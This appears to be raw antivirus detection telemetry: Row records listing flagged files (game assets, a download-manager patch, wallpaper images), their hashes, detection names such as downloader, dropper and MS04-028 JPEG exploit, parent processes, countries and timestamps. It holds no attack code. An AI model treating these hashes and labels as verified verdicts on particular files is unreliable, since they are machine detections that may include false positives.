  Row(detection=Row(filename='start_coin.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\START_COIN\\START_COIN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stage6_se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\STAGE6_SE\\STAGE6_SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='comm3.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\COMM3\\COMM3.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stage5_se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\STAGE5_SE\\STAGE5_SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='common2.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\COMMON2\\COMMON2.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='common.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\COMMON\\COMMON.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dc_se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\DC_SE\\DC_SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='damege_ga.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\DAMEGE_Ga\\DAMEGE_Ga.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stage3_se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\STAGE3_SE\\STAGE3_SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='damege_jms.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\DAMEGE_Jms\\DAMEGE_Jms.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='etc.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\ETC\\ETC.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stage4_se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\STAGE4_SE\\STAGE4_SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='stage2_se.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\SE\\STAGE2_SE\\STAGE2_SE.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='org.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\VOICE\\ORG\\ORG.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='com.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\SOUND\\VOICE\\COM\\COM.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='42f92f3f29aae13707db0e33d4fd303f4f13cb38021814171e199ab85cf5e694', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:28:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='idm-6.2.x-patch.exe', filepath='H:\\org mmak\\org\\org 2014\\yessssss net\\2014\\2015\\Internet Download Manager 6.21 Build 18 Final\\IDM-6.2.X-Patch.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R1748'), hash='430cd623c075cb0a757dd832890558020f5c17fda937bde651029c0b69144d15', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T16:40:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-184110-e8a9b352', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d5657254\\AVSCAN-20181102-184045-E440E557\\AVSCAN-20181102-184110-E8A9B352', filesize=64000, name='TR/Dropper.Gen.#M1.#R1'), hash='430cd623c075cb0a757dd832890558020f5c17fda937bde651029c0b69144d15', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:41:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153041-feba91f9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-153015-FA538386\\AVSCAN-20181102-153041-FEBA91F9', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T14:30:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline='\\\\\\/LOADSAVEDWINDOWS', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T23:59:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:33:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:51:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T17:51:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-110255-905724f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_88516b90\\AVSCAN-20181102-110235-8DD06B5C\\AVSCAN-20181102-110255-905724F3', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-173047-cac4f163', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e331b0a2\\AVSCAN-20181102-172315-78C6CC57\\AVSCAN-20181102-173047-CAC4F163', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T22:30:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline='\\\\\\/LOADSAVEDWINDOWS', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T23:59:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\explorer.exe', parentsize=2411048, timestamp='2018-11-02T14:50:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-205308-ee2138d1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_598a2ae1\\AVSCAN-20181102-205233-E99925CF\\AVSCAN-20181102-205308-EE2138D1', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:53:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcoded_000', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\Transcoded_000', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline='\\\\\\/LOADSAVEDWINDOWS', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T23:59:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-115600-049a4362', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0d9d6d\\AVSCAN-20181102-115437-F893F4A4\\AVSCAN-20181102-115600-049A4362', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:55:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153043-ff186f74', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-153015-FA538386\\AVSCAN-20181102-153043-FF186F74', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T14:30:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:53:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='easyanticheat_setup.exe', filepath='F:\\Program Files (x86)\\Soleed Games\\Far Cry 5\\bin\\EasyAntiCheat\\EasyAntiCheat_Setup.exe', filesize=848000, name='W32/Sality.AT.#M1.#R1'), hash='439b0f1ea02271af8927e1474222fd4d615c2b7af972069a3dc084d9bef26068', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-02T11:27:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='43ece90b6b536a6e39c4d893294f61ec43917c306785515bd289d311197a9e9f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-5\\43ECE90B6B536A6E39C4D893294F61EC43917C306785515BD289D311197A9E9F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='43ece90b6b536a6e39c4d893294f61ec43917c306785515bd289d311197a9e9f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:18:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='43ece90b6b536a6e39c4d893294f61ec43917c306785515bd289d311197a9e9f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-5\\43ECE90B6B536A6E39C4D893294F61EC43917C306785515BD289D311197A9E9F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='43ece90b6b536a6e39c4d893294f61ec43917c306785515bd289d311197a9e9f', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:33:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='terrain.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL11\\TERRAIN\\TERRAIN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='444ada65bfa80f9e4bffb00843807c514a821ed4c347c4d4b058558696f0bb86', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:03Z'), dt=datetime.date(2018, 11, 2)),
